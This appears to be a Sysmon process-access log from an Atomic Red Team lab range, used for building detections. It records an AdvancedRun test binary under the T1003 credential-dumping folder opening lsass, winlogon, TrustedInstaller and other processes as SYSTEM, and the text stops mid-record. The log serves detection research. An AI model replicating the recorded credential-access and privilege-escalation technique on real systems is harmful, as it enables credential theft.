10341000x80000000000000003980081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003980080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003980077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F418-61EA-6804-000000002702}3244C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F418-61EA-6904-000000002702}640C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.309{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.309{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003980067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003980065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\a